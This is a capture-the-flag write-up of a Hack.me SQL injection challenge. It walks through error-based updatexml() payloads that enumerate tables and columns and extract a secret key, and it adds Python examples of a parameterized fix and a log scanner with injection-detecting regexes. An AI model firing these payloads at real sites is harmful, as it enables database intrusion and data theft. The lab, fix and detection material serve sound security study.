[HACKME] Hack_My_Microblog

I start the Hack.me series today with a challenge made by a friend (decoder-ap): https://hack.me/102464/hack-my-microblog12.html. The objective is to find a secret key hidden in the website.

ANALYZING THE TARGET

When I started the sandbox I saw a submit form with two input fields: the first one is my nickname, the second one lets me insert some random text. I tried to see if it was vulnerable to SQLi by appending an apostrophe to the first field, but I only got a redirect to the same page. When I tried the same with the second field I got:

Ops..r u trying to hack me? hope this helps =>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 2

Cool! Let’s exploit this SQLi.
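The behaviour above (a quote in the second field ends the SQL literal, and the raw MySQL error is echoed to the browser) boils down to two defects: string concatenation of user input into the query, and error disclosure. The following is an added example, not the challenge's own code: it rebuilds the vulnerable INSERT handler beside a hardened one. It runs on Python's bundled sqlite3 instead of MySQL so it works offline; sqlite has no updatexml(), so what it shows is the quote boundary and the leaked error, not the extraction step. The table name comments_text comes from the write-up; the column names nick and text, the ERROR_PREFIX string and the SERVER_LOG list are assumptions made for the example.

```python
import sqlite3

# Added example, not the challenge's own code. The microblog runs on MySQL;
# sqlite3 is used only so the demonstration runs offline. sqlite has no
# updatexml(), so the point shown is the one from the analysis step: a quote
# in user input ends the SQL string literal, and echoing the raw driver error
# to the browser tells the user exactly that.

SERVER_LOG = []          # assumption: stand-in for the app's server-side log
ERROR_PREFIX = "Ops..r u trying to hack me? hope this helps =>"


def make_db():
    """Constructed stand-in for the comments_text table seen in the write-up
    (column names nick/text are assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments_text (nick TEXT, text TEXT)")
    return conn


def build_insert_unsafe(nick, text):
    """Query built by string concatenation. The VALUES clause sits on the
    second line, which is why the challenge reports the error 'at line 2'."""
    return ("INSERT INTO comments_text (nick, text)\n"
            "VALUES ('%s', '%s')" % (nick, text))


def insert_unsafe(conn, nick, text):
    """Vulnerable handler: runs the concatenated query and, like the
    challenge, sends the database's own error text back to the user."""
    try:
        conn.execute(build_insert_unsafe(nick, text))
        conn.commit()
        return "ok"
    except sqlite3.Error as exc:
        return ERROR_PREFIX + str(exc)


def insert_safe(conn, nick, text):
    """Hardened handler: a parameterized statement sends the values separately
    from the SQL text, so quotes and function calls in the input are stored as
    data. Failures are logged server-side and the user gets a generic message."""
    try:
        conn.execute("INSERT INTO comments_text (nick, text) VALUES (?, ?)",
                     (nick, text))
        conn.commit()
        return "ok"
    except sqlite3.Error as exc:
        SERVER_LOG.append("insert failed: %s" % exc)
        return "error"   # no engine name, no syntax fragment, no query echo


def fetch_comments(conn):
    """Returns the stored rows so the effect of each handler can be inspected."""
    return conn.execute("SELECT nick, text FROM comments_text").fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or updatexml(1, concat(0x7e, (version())), 0) or '"
    print(insert_unsafe(db, "bob", "hello"))      # ok
    print(insert_unsafe(db, "bob", payload))      # raw driver error leaks back
    print(insert_safe(db, "bob", payload))        # ok: payload stored as plain text
    print(fetch_comments(db))
```

The parameterized version is the fix that actually removes the injection; the generic error message on its own would only hide the oracle, and a blind variant of the same attack would still work against the concatenated query.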

EXPLOITATION

I assumed that the SQL query was an INSERT, and after some research I found an interesting PDF on Exploit-DB. I used the updatexml() function to exploit the SQLi: it raises an XPATH syntax error that echoes its argument, so the result of a subquery can be read straight from the error message. First of all I found the MySQL version:

' or updatexml(1, concat(0x7e, (version())), 0) or '

And I got:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~5.1.65-community-log'

So the MySQL version is 5.1.65. Now I looked for the tables:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)), 0) or '

This was the output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~comments_text'

The first table that I found is comments_text. Since the query uses a LIMIT clause, I increased its offset to check if there are more tables than this one:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)), 0) or '

The output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secret'

Bingo! Now I retrieved the column names:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 0,1)), 0) or '

I got the first field:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~userid'

Now I increased the LIMIT offset:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 1,1)), 0) or '

I got the second value:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secretkey'

Now I just extracted the data:

' or updatexml(0, concat(0x7e, (SELECT concat_ws(':', userid, secretkey) FROM secret LIMIT 0,1)), 0) or '

And I got the key!
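Every payload in this walkthrough has the same shape: an updatexml() call wrapping concat(0x7e, ...) around a subquery, and the enumeration steps all read information_schema. Those shapes are easy to alert on. The following is an added detection example, not part of the write-up: it parses constructed access-log lines and flags request parameters that match those patterns. Assumptions: the form submits to a hypothetical /post.php, the fields nick and text travel in the query string so they are visible in a web-server access log (for a POST body you would feed the same scanner from an application or WAF log), and the log lines themselves are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example, not part of the write-up. Signature shapes are taken from the
# payloads above; the log lines, the /post.php path and the nick/text field
# names are constructed for the example.

SIGNATURES = {
    # MySQL XML functions whose error message echoes their argument
    "mysql_xml_error_func": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    # catalog lookups used to enumerate tables and columns
    "schema_enumeration": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    # the 0x7e ('~') prefix that forces the XPATH syntax error
    "tilde_marker": re.compile(r"\bconcat\s*\(\s*0x7e\b", re.I),
}

# Combined-log-format request line: ip ident user [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample: a normal comment, the two first probes from the
# write-up, and a benign comment that merely mentions XML and concat.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2013:10:00:00 +0000] "GET /post.php?nick=bob&text=hello+world HTTP/1.1" 302 -',
    '10.0.0.5 - - [01/Jan/2013:10:00:05 +0000] "GET /post.php?nick=bob&text='
    '%27+or+updatexml%281%2C+concat%280x7e%2C+%28version%28%29%29%29%2C+0%29+or+%27 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2013:10:00:09 +0000] "GET /post.php?nick=bob&text='
    '%27+or+updatexml%280%2C+concat%280x7e%2C+%28SELECT+concat%28table_name%29+FROM+'
    'information_schema.tables+WHERE+table_schema%3Ddatabase%28%29+LIMIT+0%2C1%29%29%2C+0%29+or+%27'
    ' HTTP/1.1" 200 540',
    '10.0.0.7 - - [01/Jan/2013:10:01:00 +0000] "GET /post.php?nick=alice&text=I+love+XML+and+concat HTTP/1.1" 302 -',
]


def parse_line(line):
    """Splits one access-log line into its fields and URL-decodes the query
    parameters. A second unquote() catches double-encoded values."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"ip": ip, "time": ts, "method": method, "path": parts.path,
            "status": int(status), "params": params}


def scan_line(line):
    """Returns one hit per parameter value that matches at least one signature."""
    rec = parse_line(line)
    if rec is None:
        return []
    hits = []
    for field, values in rec["params"].items():
        for value in values:
            matched = sorted(name for name, rx in SIGNATURES.items() if rx.search(value))
            if matched:
                hits.append({"ip": rec["ip"], "time": rec["time"], "path": rec["path"],
                             "field": field, "signatures": matched, "value": value})
    return hits


def scan_log(lines):
    """Scans a whole log and returns the hits in order of appearance."""
    hits = []
    for line in lines:
        hits.extend(scan_line(line))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["field"], ",".join(hit["signatures"]))
```

The decoded value is kept in each hit so an analyst can see the whole query rather than just the rule name; the signatures are deliberately narrow (function call with an opening parenthesis, catalog table with its schema prefix) so a comment that merely contains the word concat, as in the last sample line, does not fire.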
